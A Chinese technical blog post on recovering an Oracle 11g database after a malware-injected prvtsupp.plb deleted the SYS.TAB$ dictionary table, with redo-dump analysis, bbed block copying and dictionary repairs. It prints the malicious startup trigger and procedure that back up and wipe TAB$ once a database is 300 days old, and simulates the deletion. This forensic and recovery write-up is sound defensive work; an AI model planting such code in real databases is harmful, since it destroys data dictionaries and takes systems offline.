Chinaunix首页 | 论坛 | 博客
  • 博客访问: 2640445
  • 博文数量: 631
  • 博客积分: 10716
  • 博客等级: 上将
  • 技术积分: 8397
  • 用 户 组: 普通用户
  • 注册时间: 2008-04-01 22:35
文章分类

全部博文(631)

文章存档

2020年(2)

2019年(22)

2018年(4)

2017年(37)

2016年(22)

2015年(1)

2013年(12)

2012年(20)

2011年(19)

2010年(20)

2009年(282)

2008年(190)

分类: Oracle

2019-02-21 11:07:36

近期大量的客户数据库软件被注入恶意代码,导致数据库无法启动,报错ORA-00600: internal error code, arguments:[16703], [1403], [20],大致的原因和预防措施可参考下面文章(复制打开,或点击”阅读原文“):

http://www.eygle.com/archives/2018/07/recover_ora-600_16703.html 


大致的意思是由于恶意攻击,$ORACLE_HOME/rdbms/admin/prvtsupp.plb被注入恶意代码。核心部分为一个触发器一个存储过程,清空了tab$,导致数据库启动时,bootstrap阶段无法完成。

create or replace triggerDBMS_SUPPORT_DBMONITOR

after startup on database

declare

begin

    DBMS_SUPPORT_DBMONITORP;

end;


/


触发器用于启动数据库后调用DBMS_SUPPORT_DBMONITORP这个存储过程,存储过程代码如下:

PROCEDUREDBMS_SUPPORT_DBMONITORP IS

DATE1 INT :=10;

BEGIN

SELECTTO_CHAR(SYSDATE-CREATED ) INTO DATE1 FROM V$DATABASE;

IF (DATE1>=300)THEN

EXECUTE IMMEDIATE'create table ORACHK'||SUBSTR(SYS_GUID,10)||' tablespace system as select *from sys.tab$';

DELETE SYS.TAB$;

COMMIT;

EXECUTE IMMEDIATE'alter system checkpoint';

END IF;

END;

/


该存储过程逻辑为:判断数据库的创建时间是否大于 300 天,如果大于300天则ctas备份tab$之后,delete tab$。


如果有备份的话,那么很简单就不展开了,本文主要介绍没备份的方法。

首先手工构造场景:

模拟DBMS_SUPPORT_DBMONITORP里的内容

SQL> @swl

 

System altered.

 

SQL> select count(*) fromt;

 

  COUNT(*)

----------

     13982

         

SQL> create table t_bak as select* from tab$;

 

Table created.

 

SQL> delete from tab$;

 

1251 rows deleted.

 

SQL> commit;

 

Commit complete.

 

SQL> alter systemcheckpoint;

 

System altered.

 

SQL> shutdown abort;

ORACLE instance shut down.


此时启动数据库报错ORA-00600: internal error code, arguments: [16703], [1403], [20]

SQL*Plus: Release 11.2.0.4.0Production on Wed Feb 13 04:21:27 2019

 

Copyright (c) 1982, 2013,Oracle.  All rights reserved.

 

Connected to an idle instance.

 

SQL> startup

ORACLE instance started.

 

Total System Global Area 1269366784bytes

Fixed Size                  2252864 bytes

Variable Size            1191186368 bytes

Database Buffers           67108864 bytes

Redo Buffers                8818688 bytes

Database mounted.

ORA-01092: ORACLE instanceterminated. Disconnection forced

ORA-00704: bootstrap process failure

ORA-00704: bootstrap process failure

ORA-00600: internal errorcode, arguments: [16703], [1403], [20], [], [], [],

[], [], [], [], [], []

Process ID: 3255

Session ID: 125 Serial number:5


恢复思路:

由于有且仅有tab$被delete,所以如果能恢复tab$的数据则数据库将得以恢复,这里我想到的大致恢复方法如下(欢迎大家提供更多的恢复思路)

  • 根据dump redo可以找到tab$被delete的rdba以及具体条目,使用bbed逐一还原(此方法非常麻烦,如果该库的表特别多,会增加更多工作量)。

  • 由于恶意代码中,delete     tab$前,ctas了一份tab$的备份,可以尝试先open数据库,再根据备份的tab$ insert到tab$中(此方法相对比较方便)。

  • odu抽取数据,重建库(如果库特别大,比如好几个t,甚至10t,100t的库则耗时太长)


本文只介绍第二种比较方便的方法,


恢复步骤大致如下:

  • open数据库

  • 根据备份的tab$     insert到tab$中


在恢复之前首先简单介绍一下tab$,tab$是cluster C_OBJ#中的一个table,CLUSTER KEY为OBJ#,C_OBJ#中还包括有ICOL$、IND$、COL$、CLU$、I_OBJ#、COLTYPE$等等bootstrap核心对象,tab$在数据库中是非常核心的一个基表,它记录了table的段头地址以及统计信息。在数据库open过程中,需要访问到的基表对象如果在tab$中不存在,则数据库将无法open,报错即为ORA-00600:internal error code, arguments: [16703], [1403], [xxx]。


CREATE CLUSTERC_OBJ#("OBJ#" NUMBER) PCTFREE 5 PCTUSED 40 INITRANS 2 MAXTRANS 255 STORAGE(  INITIAL 136K NEXT 200K MINEXTENTS 1 MAXEXTENTS2147483645 PCTINCREASE 0 OBJNO 2 EXTENTS (FILE 1 BLOCK 144))

 SIZE 800

 

CREATE TABLE TAB$("OBJ#"NUMBER NOT NULL,"DATAOBJ#" NUMBER,"TS#" NUMBER NOT NULL,"FILE#"NUMBER NOT NULL,"BLOCK#" NUMBER NOT NULL,"BOBJ#" NUMBER,"TAB#"NUMBER,"COLS" NUMBER NOT NULL,"CLUCOLS" NUMBER,"

PCTFREE$" NUMBERNOT NULL,"PCTUSED$" NUMBER NOT NULL,"INITRANS" NUMBER NOT NULL,"MAXTRANS"NUMBER NOT NULL,"FLAGS" NUMBER NOT NULL,"AUDIT$" VARCHAR2(38)NOT NULL,"ROWCNT" NUMBER,"BLKCNT" NUMBER,"EMPCNT"NUMBER,"AVGSPC" NUMBER,"CHNCNT" NUMBER,"AVGRLN" NUMBER,"AVGSPC_FLB"NUMBER,"FLBCNT" NUMBER,"ANALYZETIME" DATE,"SAMPLESIZE"NUMBER,"DEGREE" NUMBER,"INSTANCES" NUMBER,"INTCOLS"NUMBER NOT NULL,"KERNE

LCOLS" NUMBERNOT NULL,"PROPERTY" NUMBER NOT NULL,"TRIGFLAG" NUMBER,"SPARE1"NUMBER,"SPARE2" NUMBER,"SPARE3" NUMBER,"SPARE4"VARCHAR2(1000),"SPARE5" VARCHAR2(1000),"SPARE6" DATE) STORAGE(  OBJNO 4 TABNO 1) CLUSTER C_OBJ#(OBJ#)


如何open数据库?

知道了在数据库open过程中,需要访问到的基表对象如果在tab$中不存在将报错ORA-00600: internal error code, arguments:[16703], [1403], [xxx],那么将这些对象的信息还原回tab$,则数据库将open成功。

 

如何确定数据库open需要访问哪些核心基表呢?

找一个正常的数据库做open时的10046,过程如下:

SQL> startupmount;

ORACLE instancestarted.

 

Total SystemGlobal Area 1269366784 bytes

Fixed Size                  2252864 bytes

Variable Size             754978752 bytes

DatabaseBuffers          503316480 bytes

Redo Buffers                8818688 bytes

Database mounted.

SQL> @46on

Statementprocessed.

Statementprocessed.

SQL> alter databaseopen;

 

Database altered.

 

SQL> @46off

/u01/app/oracle/diag/rdbms/test/test/trace/test_ora_1769.trc

Statementprocessed.


简单的对10046 trace文件进行筛选则可以找到这些基表的obj#,并在一台同平台同版本的数据库上查询这些对象的rdba地址以及其他信息

[oracle@test ~]$grep "TABLE ACCESS"/u01/app/oracle/diag/rdbms/test/test/trace/test_ora_1769.trc|awk '{print$7}'|sort|uniq|sed 's/obj=/,/'|awk '{printf $1}'|sed 's/^,//'

10,101,103,104,105,118,12939,1297,12973,1300,13003,1302,1304,13059,1306,1307,1309,1314,13273,13298,13604,14,14137,15,16,160,161,17,18,19,192,2,20,21,22,221,225,226,227,228,23,25,252,28,29,294,297,300,301,302,304,307,31,311,32,390,4,433,436,438,446,448,451,453,455,463,5,506,514,515,517,5541,5582,567,5780,5794,5797,5804,5814,587,59,6,61,6571,6731,69,713,7144,717,721,74,8,80,83,86,88,92,95,98,99

 

SQL> SELECT a.OBJ#,TAB#,a.DATAOBJ#,BOBJ#,NAME,DBMS_ROWID.ROWID_RELATIVE_FNO(a.ROWID)FILE_ID,DBMS_ROWID.ROWID_BLOCK_NUMBER(a.ROWID) BLOCK_ID

  2  FROMTAB$ a,obj$ b

  3  WHEREa.obj#=b.obj#

  4  ANDA.OBJ# IN (10,101,103,104,105,118,12939,1297,12973,1300,13003,1302,1304,13059,1306,1307,1309,1314,13273,13298,13604,14,14137,15,16,160,161,17,18,19,192,2,20,21,22,221,225,226,227,228,23,25,252,28,29,294,297,300,301,302,304,307,31,311,32,390,4,433,436,438,446,448,451,453,455,463,5,506,514,515,517,5541,5582,567,5780,5794,5797,5804,5814,587,59,6,61,69,713,7144,717,721,74,8,80,83,86,88,92,95,98,99)

  5  orderby 6,7;

这些对象在同版本同平台的数据库上的rdba地址一般都是一致的,所以找一台正常运行的同版本同平台的数据库(最好是比较干净的库,否则后续处理会比较麻烦),使用bbed进行替换,用sql拼接出bbed的命令

SQL> SELECT DISTINCT'copy file 2 block '||block_id||' to file '||FILE_ID||' block '||BLOCK_ID FROM(

  2  SELECTa.OBJ#,TAB#,a.DATAOBJ#,BOBJ#,NAME,DBMS_ROWID.ROWID_RELATIVE_FNO(a.ROWID)FILE_ID,DBMS_ROWID.ROWID_BLOCK_NUMBER(a.ROWID) BLOCK_ID

  3  FROMTAB$ a,obj$ b

  4  WHEREa.obj#=b.obj#

  5  ANDA.OBJ# IN (10,101,103,104,105,118,12939,1297,12973,1300,13003,1302,1304,13059,1306,1307,1309,1314,13273,13298,13604,14,14137,15,16,160,161,17,18,19,192,2,20,21,22,221,225,226,227,228,23,25,252,28,29,294,297,300,301,302,304,307,31,311,32,390,4,433,436,438,446,448,451,453,455,463,5,506,514,515,517,5541,5582,567,5780,5794,5797,5804,5814,587,59,6,61,69,713,7144,717,721,74,8,80,83,86,88,92,95,98,99));

 

 


可以看到这里需要替换38个数据块,替换后可以成功open数据库


尝试open数据库:SQL> conn / as sysdba

Connected to anidle instance.

SQL> startup

ORACLE instancestarted.

 

Total System GlobalArea 1269366784 bytes

Fixed Size                  2252864 bytes

Variable Size            1191186368 bytes

DatabaseBuffers           67108864 bytes

Redo Buffers                8818688 bytes

Database mounted.

Database opened.


从alert日志可以看到此时数据库open伴随着ora-7445,并且5分钟后就会crash掉,所以要抓紧着5分钟的操作时间


如何将备份的tab$insert回tab$?

由于tab$的备份表在tab$中并没有恢复所以无法查询,下面需要根据redodump去确定tab$的备份表t_bak的rdba

SQL> desc t_bak

ERROR:

ORA-03113: end-of-fileon communication channel

Process ID: 2812

Session ID: 125 Serialnumber: 7

 

通过对logdump搜索OBJ:2(C_OBJ#的dataobj#)、OP:11.2(insert操作)、tabn:1(C_OBJ#中tab$的tab#),以及查出来的t_bak的obj#,不难找到create table as t_bak对tab$的redo日志:

CHANGE #2 TYP:2CLS:1 AFN:1 DBA:0x00407b2c OBJ:2 SCN:0x0000.000f5a8b SEQ:1 OP:11.2 ENC:0 RBL:0KTBRedo

op: 0x11  ver: 0x01 

compat bit: 4(post-11) padding: 1

op: F  xid:  0x0004.00f.0000011e    uba: 0x00c00630.0050.37

Block cleanout record,scn:  0x0000.000f5a8b ver: 0x01 opt: 0x02,entries follow...

  itli: 1 flg: 2  scn: 0x0000.000f5a8b

KDO Op code: IRP rowdependencies Disabled

  xtype: XA flags: 0x00000000  bdba: 0x00407b2c  hdba: 0x00400090

itli: 2  ispac: 0 maxfr: 4863

tabn: 1 slot: 2(0x2)size/delt: 123

fb: -CH-FL-- lb:0x2  cc: 36 cki: 0

null:

01234567890123456789012345678901234567890123456789012345678901234567890123456789

可以看到t_bak在tab$的rdba地址为0x00407b2c(file1 block 31532),cki为0即cluster key为kdbr[0]


与redo dump一致,下面开始恢复tab$中t_bak的记录,由于是cluster block所以过程有点繁琐



t_bak已经恢复完成,下面insert回tab$


SQL> insert intotab$ select * from (select * from t_bak where obj# in (select obj# from t_bak whereobj#<>14751 minus select obj# from tab$));

 

982 rows created.

 

SQL> commit;

 

Commit complete.

 

SQL> select count(*)from t;

 

  COUNT(*)

----------

     13982


至此数据库基本恢复完成。

 

但是通过hcheck脚本检查数据字典一致性发现还是有一些问题存在:

SQL> @hcheck

HCheck Version07MAY18 on 14-FEB-2019 22:49:53

----------------------------------------------

Catalog Version11.2.0.4.0 (1102000400)

db_name: LXY

                                   Catalog       Fixed

ProcedureName                     Version    Vs Release    Timestamp

Result

------------------------------... ---------- -- ---------- --------------

------

.-LobNotInObj                 ... 1102000400<=  *All Rel* 02/14 22:49:53 PASS

.-MissingOIDOnObjCol          ... 1102000400<=  *All Rel* 02/14 22:49:53 FAIL

 

HCKE-0002: Object typecolumn with missing OID$ (Doc ID 1360268.1)

OBJ#=12946 Name=SYS.AQ$SCHEDULER$_EVENT_QTABIntCol#=20=USER_DATA TabProp=

OBJ#=12953 Name=SYS.SCHEDULER$_REMDB_JOBQTABIntCol#=28=USER_DATA

TabProp=539101206

OBJ#=12953 Name=SYS.SCHEDULER$_REMDB_JOBQTABIntCol#=31=SYS_NC00031$

TabProp=539101206

OBJ#=12953 Name=SYS.SCHEDULER$_REMDB_JOBQTABIntCol#=46=SYS_NC00046$

TabProp=539101206

OBJ#=12987 Name=SYS.SCHEDULER_FILEWATCHER_QTIntCol#=28=USER_DATA

TabProp=539101190

OBJ#=12987 Name=SYS.SCHEDULER_FILEWATCHER_QTIntCol#=35=SYS_NC00035$

TabProp=539101190

OBJ#=13273 Name=SYS.AQ_EVENT_TABLEIntCol#=25=USER_DATA TabProp=539363346

OBJ#=13281 Name=SYS.AQ$AQ_EVENT_TABLEIntCol#=20=USER_DATA TabProp=

OBJ#=13282 Name=SYS.AQ$_AQ_EVENT_TABLE_FIntCol#=24=USER_DATA TabProp=

OBJ#=13285 Name=SYS.AQ_PROP_TABLEIntCol#=28=USER_DATA TabProp=539101186

OBJ#=13591 Name=SYS.SYS$SERVICE_METRICS_TABIntCol#=28=USER_DATA

TabProp=539101186

发现了11处问题,都是HCKE-0002:Object type column with missing OID$。这是什么意思呢?

分析hcheck脚本的MissingOIDOnObjCol存储过程:

 Procedure MissingOIDOnObjCol

           (nF      In Number Default 0,

            VerChk  In Number Default 5,

            Verbose In Boolean Default FALSE)

  Is

    nFr Number ;

    Cursor sCur1 Is

      Select o.obj# , o.type#, o.owner#,o.name, c.col#, c.intcol#,

               c.name cname, t.property

      From  obj$ o, col$ c, coltype$ ct, oid$ oi, tab$ t

      Where o.obj#     = ct.obj#

      And    ct.obj#   = c.obj#

      And   ct.col#    = c.col#

      And   ct.intcol# = c.intcol#

      And   oi.oid$(+) = ct.toid

      And   o.obj#     = t.obj#(+)

      And   oi.oid$ is null;

    ps1 Varchar2(10) := 'HCKE-0002';

    ps1a Varchar2(65) := 'Object type columnwith missing OID    ps1n Varchar2(40) := '(Doc ID 1360268.1)';

    CursorRun Boolean := FALSE;

  Begin

    If ( nF = 0) Then

      nFr := FindFname('MissingOIDOnObjCol') ; Else nFr :=nF;

    End If ;

 

    If ChecknCatVnFR (nCatV, nFr, VerChk) = FALSE Then Return;End If;

    For c1 In sCur1 Loop

      If (not CursorRun) Then

         report_failure('FAIL',ps1,ps1a,ps1n,CursorRun);

      End If;

      put_line(' OBJ#='||c1.obj#||'Name='||Owner(c1.owner#)||'.'

                ||c1.name||'IntCol#='||c1.intcol#||'='||c1.cname

                ||'TabProp='||c1.property);

      Fatal := Fatal + 1 ;

    End Loop ;

    If (CursorRun) Then put(chr(10)) ; else put_line('PASS');End If ;

  End ;


仔细对脚本进行分析,推测是当表的字段类型为type类型的对象时,coltype$的toid和oid$的oid$不匹配导致的,应该是之前为了open数据库替换块的时候造成的。


以OBJ#=12946Name=SYS.AQ$SCHEDULER$_EVENT_QTAB IntCol#=20=USER_DATA为例继续分析:


由于数据字典不一致,该表是不可以正常访问:

SQL> desc SYS.AQ$SCHEDULER$_EVENT_QTAB

ERROR:

ORA-00600: internal error code, arguments:[16687], [12946], [20], [], [], [], [], [], [], [], [], []

 

SQL> select * fromSYS.AQ$SCHEDULER$_EVENT_QTAB;

select *from SYS.AQ$SCHEDULER$_EVENT_QTAB

*

ERROR atline 1:

ORA-21700: object does not exist or is marked fordelete


对正常的数据库查询可以看的SYS.AQ$SCHEDULER$_EVENT_QTAB的字段名为USER_DATA的字段类型为SCHEDULER$_EVENT_INFO,通过下面的查询可以发现确实不匹配(以oid$的为准,因为之前替换的是C_OBJ#,而coltype$是C_OBJ#中的一个表):


SQL> select oid$ from oid$ where obj# in (selectobj# from obj$ where name='SCHEDULER$_EVENT_INFO');

 

OID$

--------------------------------

7BB17EE961D00845E0536438A8C00848

 

SQL> select toid from coltype$ where obj# in(select obj# from obj$ where name='AQ$SCHEDULER$_EVENT_QTAB') and intcol#=20;

 

TOID

--------------------------------

81673B4EDDF5111FE0536438A8C02F5D


通过下面的查询也可以推出以oid$的为准

SQL> select toid from type$ where toid in('7BB17EE961D00845E0536438A8C00848','81673B4EDDF5111FE0536438A8C02F5D');

 

TOID

--------------------------------

7BB17EE961D00845E0536438A8C00848


修改coltype$后恢复正常:

SQL> update coltype$ set toid='7BB17EE961D00845E0536438A8C00848'where obj# in (select obj# from obj$ where name='AQ$SCHEDULER$_EVENT_QTAB') andintcol#=20;

 

1 row updated.

 

SQL> commit;

 

Commit complete.

 

SQL> @flc

System altered.

System altered.

 

SQL> select * fromAQ$SCHEDULER$_EVENT_QTAB;

 

no rows selected


逐一修改后,再次执行hcheck:

SQL> @hcheck

HCheck Version07MAY18 on 15-FEB-2019 01:56:00

----------------------------------------------

Catalog Version11.2.0.4.0 (1102000400)

db_name: LXY

  

                                

15-FEB-2019 01:56:01  Elapsed: 1 secs

---------------------------------------

Found 0 potentialproblem(s) and 0 warning(s)

 

PL/SQL proceduresuccessfully completed.

 

Statementprocessed.


至此整个数据库比较完整的恢复完毕。

 

原创:李翔宇

阅读(1646) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~